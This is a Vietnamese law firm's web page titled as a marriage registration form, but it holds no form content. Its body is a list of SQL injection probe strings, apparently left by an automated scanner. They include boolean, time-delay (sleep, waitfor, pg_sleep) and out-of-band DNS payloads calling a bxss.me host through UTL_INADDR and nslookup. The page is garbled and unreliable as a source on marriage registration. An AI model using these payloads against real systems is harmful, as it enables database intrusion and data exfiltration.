Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí kết hôn

Cập nhật lần cuối lúc 15:54 ngày 12/07/2013

Nguồn: Công ty Luật Vinabiz/ Nguoiduatin.vn
1
1
1
1
1'"
-1 OR 2+490-490-1=0+0+0+1 --
\
-1 OR 3+490-490-1=0+0+0+1 --
-1 OR 3*2<(0+5+490-490) --
1
@@B1Jxs
JyI=
-1 OR 3*2>(0+5+490-490) --
-1 OR 2+767-767-1=0+0+0+1
-1 OR 3+767-767-1=0+0+0+1
-1 OR 3*2<(0+5+767-767)
-1 OR 3*2>(0+5+767-767)
-1' OR 2+594-594-1=0+0+0+1 --
-1' OR 3+594-594-1=0+0+0+1 --
-1' OR 3*2<(0+5+594-594) --
-1' OR 3*2>(0+5+594-594) --
-1' OR 2+528-528-1=0+0+0+1 or 'J6sIqtfc'='
-1' OR 3+528-528-1=0+0+0+1 or 'J6sIqtfc'='
-1' OR 3*2<(0+5+528-528) or 'J6sIqtfc'='
-1' OR 3*2>(0+5+528-528) or 'J6sIqtfc'='
-1" OR 2+126-126-1=0+0+0+1 --
-1" OR 3+126-126-1=0+0+0+1 --
-1" OR 3*2<(0+5+126-126) --
-1" OR 3*2>(0+5+126-126) --
if(now()=sysdate(),sleep(6.672),0)/*'XOR(if(now()=sysdate(),sleep(6.672),0))OR'"XOR(if(now()=sysdate(),sleep(6.672),0))OR"*/
(select(0)from(select(sleep(6.672)))v)/*'+(select(0)from(select(sleep(6.672)))v)+'"+(select(0)from(select(sleep(6.672)))v)+"*/
(select(0)from(select(sleep(13.344)))v)/*'+(select(0)from(select(sleep(13.344)))v)+'"+(select(0)from(select(sleep(13.344)))v)+"*/
-1; waitfor delay '0:0:13.344' --
-1); waitfor delay '0:0:13.344' --
1 waitfor delay '0:0:20.016' --
wvUTnsbc'; waitfor delay '0:0:20.016' --
-1;select pg_sleep(6.672); --
-1);select pg_sleep(6.672); --
-1));select pg_sleep(6.672); --
IPRUn4f6';select pg_sleep(6.672); --
XxjUSYKO');select pg_sleep(13.344); --
9HM3x5pt'));select pg_sleep(13.344); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6070.34060.cb426.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6071.34060.cb426.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6073.34060.cb426.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6074.34060.cb426.\1.bxss.me
117'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: